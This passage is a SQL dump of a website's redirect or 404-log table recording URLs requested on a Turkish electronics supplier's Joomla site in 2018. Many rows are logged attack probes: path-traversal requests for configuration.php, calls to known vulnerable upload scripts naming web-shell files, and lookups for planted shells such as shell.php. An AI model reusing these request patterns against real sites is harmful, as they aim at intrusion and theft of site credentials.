18:27:47','0000-00-00 00:00:00',301),(21127,'http://www.3s-technologies.com.tr/config.php',NULL,'','',2,0,'2018-09-27 23:34:30','0000-00-00 00:00:00',301),(21128,'http://www.3s-technologies.com.tr/en/fileman/dev.html',NULL,'http://www.3s-technologies.com.tr/fileman/dev.html','',1,0,'2018-09-28 02:41:55','0000-00-00 00:00:00',301),(21129,'http://3s-technologies.com.tr/tr/chcmbkzbm.html',NULL,'','',1,0,'2018-09-28 04:00:18','0000-00-00 00:00:00',301),(21130,'http://www.3s-technologies.com.tr/en/administrator/components/com_xcloner-backupandrestore/index2.php',NULL,'http://www.3s-technologies.com.tr/administrator/components/com_xcloner-backupandrestore/index2.php','',1,0,'2018-09-28 04:03:24','0000-00-00 00:00:00',301),(21131,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,ordering/results,6-25',NULL,'','',3,0,'2018-09-29 07:41:08','0000-00-00 00:00:00',301),(21132,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,category_name/results,6-25',NULL,'','',6,0,'2018-09-29 07:42:14','0000-00-00 00:00:00',301),(21133,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,mf_name/results,6-25',NULL,'','',5,0,'2018-09-29 07:43:58','0000-00-00 00:00:00',301),(21134,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,product_name/dirdesc/results,6-25',NULL,'','',3,0,'2018-09-29 07:44:38','0000-00-00 00:00:00',301),(21135,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,product_sku/results,6-25',NULL,'','',4,0,'2018-09-29 07:45:23','0000-00-00 00:00:00',301),(21136,'http://www.3s-technologies.com.tr/en/modules/simpleslideshow/uploadimage.php',NULL,'http://www.3s-technologies.com.tr/modules/simpleslideshow/uploadimage.php','',2,0,'2018-09-30 02:43:36','0000-00-00 00:00:00',301),(21137,'http://www.3s-technologies.com.tr/en/wp-content/plugins/wp-dreamworkgallery/readme.txt',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/wp-dreamworkgallery/readme.txt','',4,0,'2018-09-30 03:01:22','0000-00-00 00:00:00',301),(21138,'http://www.3s-technologies.com.tr/tr/apple-touch-icon-152x152-precomposed.png',NULL,'','',5,0,'2018-09-30 06:47:21','0000-00-00 00:00:00',301),(21139,'http://www.3s-technologies.com.tr/tr/apple-touch-icon-152x152.png',NULL,'','',5,0,'2018-09-30 06:47:21','0000-00-00 00:00:00',301),(21140,'http://www.3s-technologies.com.tr/tr/apple-touch-icon-precomposed.png',NULL,'','',82,0,'2018-09-30 06:47:21','0000-00-00 00:00:00',301),(21141,'http://www.3s-technologies.com.tr/tr/apple-touch-icon.png',NULL,'','',96,0,'2018-09-30 06:47:21','0000-00-00 00:00:00',301),(21142,'http://3s-technologies.com.tr/en/products/2.-el-makineler/results,6-25?language=en-gb',NULL,'','',13,0,'2018-09-30 16:24:47','0000-00-00 00:00:00',301),(21143,'http://3s-technologies.com.tr/en/products/2.-el-makineler/results,6-55?language=en-gb',NULL,'','',11,0,'2018-09-30 16:24:53','0000-00-00 00:00:00',301),(21144,'http://3s-technologies.com.tr/en/products/2.-el-makineler/dirdesc/results,6-10?language=en-gb',NULL,'','',8,0,'2018-09-30 16:25:00','0000-00-00 00:00:00',301),(21145,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/xmlrpc.php',NULL,'','',1,0,'2018-09-30 22:10:17','0000-00-00 00:00:00',301),(21146,'http://3s-technologies.com.tr/tr/status?full',NULL,'','',4,0,'2018-09-30 22:43:39','0000-00-00 00:00:00',301),(21147,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/petx.php?baca',NULL,'','',1,0,'2018-10-01 00:10:59','0000-00-00 00:00:00',301),(21148,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/explore.php?baca',NULL,'','',1,0,'2018-10-01 00:11:02','0000-00-00 00:00:00',301),(21149,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/magic.php?baca',NULL,'','',1,0,'2018-10-01 00:11:04','0000-00-00 00:00:00',301),(21150,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/magic.php.png?baca',NULL,'','',2,0,'2018-10-01 00:11:07','0000-00-00 00:00:00',301),(21151,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/magic.php.php?baca',NULL,'','',1,0,'2018-10-01 00:11:09','0000-00-00 00:00:00',301),(21152,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/images/stories/ngatjeng.php.png',NULL,'','',4,0,'2018-10-01 00:11:30','0000-00-00 00:00:00',301),(21153,'http://3s-technologies.com.tr/en/products/2.-el-makineler/results,6-15?language=en-gb',NULL,'','',5,0,'2018-10-01 10:40:37','0000-00-00 00:00:00',301),(21154,'http://3s-technologies.com.tr/tr/index.php/component/users?view=login',NULL,'','',20,0,'2018-10-01 12:26:43','0000-00-00 00:00:00',301),(21155,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/screen-printer/by,mf_name/',NULL,'','',1,0,'2018-10-01 13:23:24','0000-00-00 00:00:00',301),(21156,'http://www.3s-technologies.com.tr/tr/wp-updats.php',NULL,'','',1,0,'2018-10-02 17:33:21','0000-00-00 00:00:00',301),(21157,'http://www.3s-technologies.com.tr/tr/wp-includes/js/jquery/jquery.js',NULL,'','',22,0,'2018-10-02 20:24:05','0000-00-00 00:00:00',301),(21158,'http://www.3s-technologies.com.tr/tr/forum/register.php',NULL,'','',10,0,'2018-10-02 20:24:07','0000-00-00 00:00:00',301),(21159,'http://www.3s-technologies.com.tr/tr/user/login',NULL,'','',11,0,'2018-10-02 20:24:12','0000-00-00 00:00:00',301),(21160,'http://www.3s-technologies.com.tr//administrator/components/com_simplephotogallery/lib/uploadfile.php',NULL,'','',17,0,'2018-10-02 20:24:21','0000-00-00 00:00:00',301),(21161,'http://www.3s-technologies.com.tr/tr/xattacker\'..\'',NULL,'','',10,0,'2018-10-02 20:24:22','0000-00-00 00:00:00',301),(21162,'http://www.3s-technologies.com.tr//modules/mod_socialpinboard_menu/saveimagefromupload.php',NULL,'','',17,0,'2018-10-02 20:24:34','0000-00-00 00:00:00',301),(21163,'http://www.3s-technologies.com.tr/tr/components/com_foxcontact/js/fileuploader.js',NULL,'','',8,0,'2018-10-02 20:24:35','0000-00-00 00:00:00',301),(21164,'http://www.3s-technologies.com.tr//en/contact',NULL,'','',26,0,'2018-10-02 20:24:42','0000-00-00 00:00:00',301),(21165,'http://www.3s-technologies.com.tr/tr/contact-us.html',NULL,'','',10,0,'2018-10-02 20:24:55','0000-00-00 00:00:00',301),(21166,'http://www.3s-technologies.com.tr/tr/index.php/contact',NULL,'','',8,0,'2018-10-02 20:24:58','0000-00-00 00:00:00',301),(21167,'http://www.3s-technologies.com.tr/tr/index.php/contact/adres',NULL,'','',8,0,'2018-10-02 20:24:59','0000-00-00 00:00:00',301),(21168,'http://www.3s-technologies.com.tr/tr/modules/mod_dvfoldercontent/download.php?f=li4vli4vy29uzmlndxjhdglvbi5waha=',NULL,'','',18,0,'2018-10-02 20:25:19','0000-00-00 00:00:00',301),(21169,'http://www.3s-technologies.com.tr/tr/plugins/content/jw_allvideos/includes/download.php?file=../../../../configuration.php',NULL,'','',17,0,'2018-10-02 20:25:20','0000-00-00 00:00:00',301),(21170,'http://www.3s-technologies.com.tr/tr/index.php?option=com_product_modul&task=download&file=../../../../../configuration.php&id=1&itemid=1',NULL,'','',17,0,'2018-10-02 20:25:21','0000-00-00 00:00:00',301),(21171,'http://www.3s-technologies.com.tr/tr/components/com_contushdvideoshare/hdflvplayer/download.php?f=../../../configuration.php',NULL,'','',17,0,'2018-10-02 20:25:24','0000-00-00 00:00:00',301),(21172,'http://www.3s-technologies.com.tr/tr/index.php?option=com_community&view=groups&groupid=1&task=app&app=groupfilesharing&do=download&file=../../../../configuration.php&itemid=0',NULL,'','',17,0,'2018-10-02 20:25:24','0000-00-00 00:00:00',301),(21173,'http://www.3s-technologies.com.tr/tr/administrator/components/com_aceftp/quixplorer/index.php?action=download&dir=&item=configuration.php&order=name&srt=yes',NULL,'','',18,0,'2018-10-02 20:25:24','0000-00-00 00:00:00',301),(21174,'http://www.3s-technologies.com.tr/tr/plugins/content/wd/wddownload.php?download=wddownload.php&file=../../../configuration.php',NULL,'','',17,0,'2018-10-02 20:25:26','0000-00-00 00:00:00',301),(21175,'http://www.3s-technologies.com.tr/tr/configuration.php~',NULL,'','',8,0,'2018-10-02 20:25:26','0000-00-00 00:00:00',301),(21176,'http://www.3s-technologies.com.tr/tr/configuration.php_bak',NULL,'','',8,0,'2018-10-02 20:25:27','0000-00-00 00:00:00',301),(21177,'http://www.3s-technologies.com.tr/tr/configuration.php-bak',NULL,'','',8,0,'2018-10-02 20:25:27','0000-00-00 00:00:00',301),(21178,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,pc.ordering,product_name/results,1-5',NULL,'','',11,0,'2018-10-02 23:26:16','0000-00-00 00:00:00',301),(21179,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,pc.ordering,product_name/results,1-50',NULL,'','',17,0,'2018-10-02 23:27:07','0000-00-00 00:00:00',301),(21180,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,pc.ordering,product_name/results,6-10',NULL,'','',14,0,'2018-10-02 23:28:01','0000-00-00 00:00:00',301),(21181,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,pc.ordering,product_name/results,1-20',NULL,'','',12,0,'2018-10-02 23:28:56','0000-00-00 00:00:00',301),(21182,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,pc.ordering,product_name/results,1-10',NULL,'','',11,0,'2018-10-02 23:29:59','0000-00-00 00:00:00',301),(21183,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,mf_name/dirdesc/results,1-5',NULL,'','',4,0,'2018-10-03 00:44:12','0000-00-00 00:00:00',301),(21184,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,mf_name/dirdesc/results,1-50',NULL,'','',3,0,'2018-10-03 00:44:47','0000-00-00 00:00:00',301),(21185,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,mf_name/dirdesc/results,1-10',NULL,'','',3,0,'2018-10-03 00:45:16','0000-00-00 00:00:00',301),(21186,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article\'a=0&id=46&itemid=67&lang=tr',NULL,'http://www.3s-technologies.com.tr/index.php?option=com_content&view=article\'A=0&id=46&Itemid=67&lang=tr','',1,0,'2018-10-03 14:24:09','0000-00-00 00:00:00',301),(21187,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,mf_name/results,6-15',NULL,'','',3,0,'2018-10-03 17:09:39','0000-00-00 00:00:00',301),(21188,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,ordering/results,6-15',NULL,'','',5,0,'2018-10-03 17:09:49','0000-00-00 00:00:00',301),(21189,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,product_sku/results,6-15',NULL,'','',3,0,'2018-10-03 17:09:59','0000-00-00 00:00:00',301),(21190,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,category_name/results,6-15',NULL,'','',3,0,'2018-10-03 17:10:09','0000-00-00 00:00:00',301),(21191,'http://3s-technologies.com.tr/tr/_phpmyadmin/scripts/setup.php',NULL,'','',1,0,'2018-10-03 20:57:49','0000-00-00 00:00:00',301),(21192,'http://3s-technologies.com.tr/tr/admin/scripts/setup.php',NULL,'','',1,0,'2018-10-03 20:57:54','0000-00-00 00:00:00',301),(21193,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/product/resized/rhii_640x420_250x250.jpg',NULL,'','',2,0,'2018-10-04 02:08:08','0000-00-00 00:00:00',301),(21194,'http://www.3s-technologies.com.tr/en/administrator/components/com_xcloner-backupandrestore/admin.cloner.php',NULL,'http://www.3s-technologies.com.tr/administrator/components/com_xcloner-backupandrestore/admin.cloner.php','',1,0,'2018-10-04 04:13:54','0000-00-00 00:00:00',301),(21195,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,product_name/dirdesc/results,6-15',NULL,'','',2,0,'2018-10-04 05:30:34','0000-00-00 00:00:00',301),(21196,'http://www.3s-technologies.com.tr/en/administrator/components/com_xcloner-backupandrestore/index.php',NULL,'http://www.3s-technologies.com.tr/administrator/components/com_xcloner-backupandrestore/index.php','',1,0,'2018-10-05 02:55:55','0000-00-00 00:00:00',301),(21197,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/images/urunler/t_mi300.jpg',NULL,'','',31,0,'2018-10-05 11:26:09','0000-00-00 00:00:00',301),(21198,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/flux/by,category_name/dirdesc',NULL,'','',1,0,'2018-10-05 11:53:05','0000-00-00 00:00:00',301),(21199,'http://www.3s-technologies.com.tr/en/wp-content/themes/qualifire/style.css',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/qualifire/style.css','',4,0,'2018-10-05 11:53:57','0000-00-00 00:00:00',301),(21200,'http://www.3s-technologies.com.tr/en/modules/columnadverts/uploadimage.php',NULL,'http://www.3s-technologies.com.tr/modules/columnadverts/uploadimage.php','',1,0,'2018-10-06 02:31:08','0000-00-00 00:00:00',301),(21201,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,product_name/results,6-10',NULL,'','',15,0,'2018-10-08 03:47:20','0000-00-00 00:00:00',301),(21202,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,category_name/results,6-10',NULL,'','',16,0,'2018-10-08 03:47:35','0000-00-00 00:00:00',301),(21203,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,pc.ordering,product_name/results,1-5',NULL,'','',5,0,'2018-10-08 03:47:48','0000-00-00 00:00:00',301),(21204,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,pc.ordering,product_name/results,6-10',NULL,'','',12,0,'2018-10-08 03:48:14','0000-00-00 00:00:00',301),(21205,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,pc.ordering,product_name/dirdesc/results,6-10',NULL,'','',9,0,'2018-10-08 03:49:51','0000-00-00 00:00:00',301),(21206,'http://3s-technologies.com.tr/wuwu11.php',NULL,'http://3s-technologies.com.tr/wuwu11.php','',2,0,'2018-10-08 21:26:32','0000-00-00 00:00:00',301),(21207,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/anasayfa/80-turkish-tr/turkish-content',NULL,'','',3,0,'2018-10-09 02:39:38','0000-00-00 00:00:00',301),(21208,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/anasayfa/78-turkish-tr',NULL,'','',4,0,'2018-10-09 02:41:57','0000-00-00 00:00:00',301),(21209,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/by,pc.ordering,product_name/dirdesc/results,1-5',NULL,'','',2,0,'2018-10-09 04:27:52','0000-00-00 00:00:00',301),(21210,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-orta-hızlı/by,pc.ordering,product_name/dirdesc',NULL,'','',2,0,'2018-10-09 04:27:54','0000-00-00 00:00:00',301),(21211,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/by,pc.ordering,product_name',NULL,'','',2,0,'2018-10-09 04:27:55','0000-00-00 00:00:00',301),(21212,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/by,pc.ordering,product_name/dirdesc',NULL,'','',2,0,'2018-10-09 04:28:29','0000-00-00 00:00:00',301),(21213,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/by,pc.ordering,product_name/dirdesc/results,1-10',NULL,'','',2,0,'2018-10-09 04:29:40','0000-00-00 00:00:00',301),(21214,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,pc.ordering,product_name/dirdesc',NULL,'','',2,0,'2018-10-09 04:31:19','0000-00-00 00:00:00',301),(21215,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/by,ordering',NULL,'','',2,0,'2018-10-09 04:31:44','0000-00-00 00:00:00',301),(21216,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/manufacturer/resized/index_01_150x150.jpg',NULL,'','',5,0,'2018-10-09 08:14:47','0000-00-00 00:00:00',301),(21217,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/manufacturer/resized/logo-ddm_150x150.jpg',NULL,'','',5,0,'2018-10-09 08:14:54','0000-00-00 00:00:00',301),(21218,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/manufacturer/resized/mirae_logo_150x150.gif',NULL,'','',5,0,'2018-10-09 08:14:55','0000-00-00 00:00:00',301),(21219,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/manufacturer/resized/tolo_logo_150x150.jpg',NULL,'','',5,0,'2018-10-09 08:14:57','0000-00-00 00:00:00',301),(21220,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/manufacturer/resized/kester-logo2_150x150.jpg',NULL,'','',4,0,'2018-10-09 08:14:58','0000-00-00 00:00:00',301),(21221,'http://www.3s-technologies.com.tr/tr/images/stories/virtuemart/manufacturer/resized/logo-panasonic6_150x150.jpg',NULL,'','',5,0,'2018-10-09 08:15:00','0000-00-00 00:00:00',301),(21222,'http://www.3s-technologies.com.tr/en/modules/homepageadvertise/uploadimage.php',NULL,'http://www.3s-technologies.com.tr/modules/homepageadvertise/uploadimage.php','',2,0,'2018-10-10 04:13:16','0000-00-00 00:00:00',301),(21223,'http://3s-technologies.com.tr/tr/wp-content/plugins/complete-gallery-manager/frames/upload-images.php',NULL,'http://3s-technologies.com.tr/tr/wp-content/plugins/complete-gallery-manager/frames/upload-images.php','',3,0,'2018-10-10 05:52:24','0000-00-00 00:00:00',301),(21224,'http://www.3s-technologies.com.tr/tr/application/configs/application.ini',NULL,'','',7,0,'2018-10-10 08:39:10','0000-00-00 00:00:00',301),(21225,'http://www.3s-technologies.com.tr/tr/xxx.php',NULL,'','',54,0,'2018-10-10 08:39:14','0000-00-00 00:00:00',301),(21226,'http://www.3s-technologies.com.tr/tr/error.php',NULL,'','',39,0,'2018-10-10 08:39:21','0000-00-00 00:00:00',301),(21227,'http://www.3s-technologies.com.tr/tr/vulns.php',NULL,'','',7,0,'2018-10-10 08:39:22','0000-00-00 00:00:00',301),(21228,'http://www.3s-technologies.com.tr/tr/images/jdownloads/screenshots/tool/bot.php3.g',NULL,'','',7,0,'2018-10-10 08:39:23','0000-00-00 00:00:00',301),(21229,'http://www.3s-technologies.com.tr/tr/images/jdownloads/screenshots/bot.php3.g',NULL,'','',7,0,'2018-10-10 08:39:25','0000-00-00 00:00:00',301),(21230,'http://www.3s-technologies.com.tr/tr/media/error.php',NULL,'','',14,0,'2018-10-10 08:39:45','0000-00-00 00:00:00',301),(21231,'http://www.3s-technologies.com.tr/tr/media/izo.php.txt',NULL,'','',7,0,'2018-10-10 08:39:46','0000-00-00 00:00:00',301),(21232,'http://www.3s-technologies.com.tr/tr/media/izox.php',NULL,'','',7,0,'2018-10-10 08:39:46','0000-00-00 00:00:00',301),(21233,'http://www.3s-technologies.com.tr//components/com_oziogallery/imagin/scripts_ralcr/filesystem/writetofile.php',NULL,'','',14,0,'2018-10-10 08:39:48','0000-00-00 00:00:00',301),(21234,'http://www.3s-technologies.com.tr/tr/x.php',NULL,'','',54,0,'2018-10-10 08:39:49','0000-00-00 00:00:00',301),(21235,'http://www.3s-technologies.com.tr//components/com_oziogallery2/imagin/scripts_ralcr/filesystem/writetofile.php',NULL,'','',7,0,'2018-10-10 08:39:49','0000-00-00 00:00:00',301),(21236,'http://www.3s-technologies.com.tr/tr/zxattacker.php?x=attacker',NULL,'','',7,0,'2018-10-10 08:39:51','0000-00-00 00:00:00',301),(21237,'http://www.3s-technologies.com.tr//components/com_jbcatalog/libraries/jsupload/server/php/',NULL,'','',7,0,'2018-10-10 08:39:53','0000-00-00 00:00:00',301),(21238,'http://www.3s-technologies.com.tr/tr/components/com_jbcatalog/libraries/jsupload/server/php/files/error.php',NULL,'','',7,0,'2018-10-10 08:39:53','0000-00-00 00:00:00',301),(21239,'http://www.3s-technologies.com.tr/tr/tmp/plupload/rxr.php',NULL,'','',7,0,'2018-10-10 08:39:56','0000-00-00 00:00:00',301),(21240,'http://www.3s-technologies.com.tr/tr/tmp/plupload/izo.php',NULL,'','',14,0,'2018-10-10 08:39:57','0000-00-00 00:00:00',301),(21241,'http://www.3s-technologies.com.tr/tr/tmp/plupload/izo.phtml',NULL,'','',7,0,'2018-10-10 08:39:58','0000-00-00 00:00:00',301),(21242,'http://www.3s-technologies.com.tr/tr/components/izoc.php',NULL,'','',7,0,'2018-10-10 08:40:00','0000-00-00 00:00:00',301),(21243,'http://www.3s-technologies.com.tr/tr/com_sexycontactform/fileupload/files/error.php',NULL,'','',7,0,'2018-10-10 08:40:01','0000-00-00 00:00:00',301),(21244,'http://www.3s-technologies.com.tr/tr/images/stories/xx.php.xxxjpg',NULL,'','',14,0,'2018-10-10 08:40:08','0000-00-00 00:00:00',301),(21245,'http://www.3s-technologies.com.tr/tr/xx.php.xxxjpg',NULL,'','',7,0,'2018-10-10 08:40:13','0000-00-00 00:00:00',301),(21246,'http://www.3s-technologies.com.tr//modules/megamenu/uploadify/uploadify.php?folder=modules/megamenu/uploadify/\"',NULL,'','',7,0,'2018-10-10 08:40:16','0000-00-00 00:00:00',301),(21247,'http://www.3s-technologies.com.tr/tr/modules/megamenu/uploadify/error.php',NULL,'','',7,0,'2018-10-10 08:40:16','0000-00-00 00:00:00',301),(21248,'http://www.3s-technologies.com.tr/tr/modules/mod_simplefileuploadv1.3/elements/error.php',NULL,'','',7,0,'2018-10-10 08:40:21','0000-00-00 00:00:00',301),(21249,'http://www.3s-technologies.com.tr//administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php',NULL,'','',9,0,'2018-10-10 08:40:22','0000-00-00 00:00:00',301),(21250,'http://www.3s-technologies.com.tr/tr/administrator/components/com_bt_portfolio/error.php',NULL,'','',7,0,'2018-10-10 08:40:23','0000-00-00 00:00:00',301),(21251,'http://www.3s-technologies.com.tr/tr/jwallpapers_files/plupload/error.php',NULL,'','',7,0,'2018-10-10 08:40:24','0000-00-00 00:00:00',301),(21252,'http://www.3s-technologies.com.tr//administrator/components/com_redmystic/chart/ofc-library/ofc_upload_image.php?name=izo.php',NULL,'','',9,0,'2018-10-10 08:40:24','0000-00-00 00:00:00',301),(21253,'http://www.3s-technologies.com.tr/tr/components/com_facileforms/libraries/jquery/error.php',NULL,'','',7,0,'2018-10-10 08:40:26','0000-00-00 00:00:00',301),(21254,'http://www.3s-technologies.com.tr//administrator/components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php?name=izoc.php',NULL,'','',7,0,'2018-10-10 08:40:26','0000-00-00 00:00:00',301),(21255,'http://www.3s-technologies.com.tr/tr/administrator/components/com_civicrm/civicrm/packages/openflashchart/tmp-upload-images/izoc.php',NULL,'','',7,0,'2018-10-10 08:40:27','0000-00-00 00:00:00',301),(21256,'http://www.3s-technologies.com.tr//administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php?name=izoc.php',NULL,'','',7,0,'2018-10-10 08:40:28','0000-00-00 00:00:00',301),(21257,'http://www.3s-technologies.com.tr/tr/administrator/components/com_maian15/charts/tmp-upload-images/izoc.php',NULL,'','',7,0,'2018-10-10 08:40:29','0000-00-00 00:00:00',301),(21258,'http://www.3s-technologies.com.tr//administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=izoc.php',NULL,'','',7,0,'2018-10-10 08:40:29','0000-00-00 00:00:00',301),(21259,'http://www.3s-technologies.com.tr/tr/administrator/components/com_acymailing/inc/openflash/tmp-upload-images/izoc.php',NULL,'','',7,0,'2018-10-10 08:40:30','0000-00-00 00:00:00',301),(21260,'http://www.3s-technologies.com.tr//administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=izoc.php',NULL,'','',7,0,'2018-10-10 08:40:30','0000-00-00 00:00:00',301),(21261,'http://www.3s-technologies.com.tr/tr/administrator/components/com_jnewsletter/includes/openflashchart/tmp-upload-images/izoc.php',NULL,'','',7,0,'2018-10-10 08:40:31','0000-00-00 00:00:00',301),(21262,'http://www.3s-technologies.com.tr//administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php?name=izoc.php',NULL,'','',7,0,'2018-10-10 08:40:31','0000-00-00 00:00:00',301),(21263,'http://www.3s-technologies.com.tr/tr/administrator/components/com_jinc/classes/graphics/tmp-upload-images/izoc.php',NULL,'','',7,0,'2018-10-10 08:40:32','0000-00-00 00:00:00',301),(21264,'http://www.3s-technologies.com.tr//administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=izoc.php',NULL,'','',7,0,'2018-10-10 08:40:32','0000-00-00 00:00:00',301),(21265,'http://www.3s-technologies.com.tr/tr/administrator/components/com_maianmedia/utilities/charts/tmp-upload-images/izoc.php',NULL,'','',7,0,'2018-10-10 08:40:33','0000-00-00 00:00:00',301),(21266,'http://www.3s-technologies.com.tr//administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=izoc.php',NULL,'','',7,0,'2018-10-10 08:40:34','0000-00-00 00:00:00',301),(21267,'http://www.3s-technologies.com.tr/tr/administrator/components/com_jnews/includes/openflashchart/tmp-upload-images/izoc.php',NULL,'','',7,0,'2018-10-10 08:40:34','0000-00-00 00:00:00',301),(21268,'http://www.3s-technologies.com.tr/tr/index.php?option=com_k2&view=media&task=connector&cmd=file&target=l1_li4vy29uzmlndxjhdglvbi5waha=&download=1&token=1',NULL,'','',7,0,'2018-10-10 08:40:47','0000-00-00 00:00:00',301),(21269,'http://www.3s-technologies.com.tr/tr/shell.php',NULL,'','',75,0,'2018-10-10 08:40:48','0000-00-00 00:00:00',301),(21270,'http://www.3s-technologies.com.tr/tr/media/shell.php',NULL,'','',7,0,'2018-10-10 08:40:57','0000-00-00 00:00:00',301),(21271,'http://www.3s-technologies.com.tr/tr/images/shell.php',NULL,'','',7,0,'2018-10-10 08:40:58','0000-00-00 00:00:00',301),(21272,'http://www.3s-technologies.com.tr/tr/098.php',NULL,'','',7,0,'2018-10-10 08:40:58','0000-00-00 00:00:00',301),(21273,'http://3s-technologies.com.tr/en/wp-content/plugins/complete-gallery-manager/frames/upload-images.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/complete-gallery-manager/frames/upload-images.php','',1,0,'2018-10-10 10:06:15','0000-00-00 00:00:00',301),(21274,'http://www.3s-technologies.com.tr/en/css_.php',NULL,'','',1,0,'2018-10-10 19:39:28','0000-00-00 00:00:00',301),(21275,'http://www.3s-technologies.com.tr/tr/index.php?option=com_jdownloads&itemid=0&view=upload',NULL,'','',8,0,'2018-10-10 23:49:19','0000-00-00 00:00:00',301),(21276,'http://3s-technologies.com.tr/tr/wp/wp-login.php',NULL,'','',59,0,'2018-10-11 20:35:11','0000-00-00 00:00:00',301),(21277,'http://3s-technologies.com.tr/tr//blog/robots.txt',NULL,'','',1,0,'2018-10-12 02:38:50','0000-00-00 00:00:00',301),(21278,'http://3s-technologies.com.tr/tr//blog/',NULL,'','',1,0,'2018-10-12 02:38:50','0000-00-00 00:00:00',301),(21279,'http://3s-technologies.com.tr/tr//wordpress/',NULL,'','',1,0,'2018-10-12 02:38:51','0000-00-00 00:00:00',301),(21280,'http://3s-technologies.com.tr/tr//wp/',NULL,'','',1,0,'2018-10-12 02:38:51','0000-00-00 00:00:00',301),(21281,'http://3s-technologies.com.tr/tr/components/com_foxcontact/foxcontact.php',NULL,'','',65,0,'2018-10-12 12:27:21','0000-00-00 00:00:00',301),(21282,'http://3s-technologies.com.tr/tr/sqrodbhziprfn.html',NULL,'','',1,0,'2018-10-13 07:32:40','0000-00-00 00:00:00',301),(21283,'http://www.3s-technologies.com.tr/en/rxr.php?rxr',NULL,'http://www.3s-technologies.com.tr/rxr.php?rxr','',1,0,'2018-10-14 14:29:38','0000-00-00 00:00:00',301),(21284,'http://3s-technologies.com.tr/en/stats/awstats.pl',NULL,'','',1,0,'2018-10-14 14:42:23','0000-00-00 00:00:00',301),(21285,'http://3s-technologies.com.tr/en/awstats7/awstats.pl',NULL,'','',1,0,'2018-10-14 16:43:27','0000-00-00 00:00:00',301),(21286,'http://3s-technologies.com.tr/en/stats/cgi-bin/awstats.pl',NULL,'','',1,0,'2018-10-14 17:52:05','0000-00-00 00:00:00',301),(21287,'http://3s-technologies.com.tr/en/statistics/cgi-bin/awstats.pl',NULL,'','',1,0,'2018-10-15 02:20:22','0000-00-00 00:00:00',301),(21288,'http://3s-technologies.com.tr/en/webstat/cgi-bin/awstats.pl',NULL,'','',1,0,'2018-10-15 10:12:12','0000-00-00 00:00:00',301),(21289,'http://3s-technologies.com.tr/en/awstats/awstats.pl',NULL,'','',1,0,'2018-10-15 13:49:52','0000-00-00 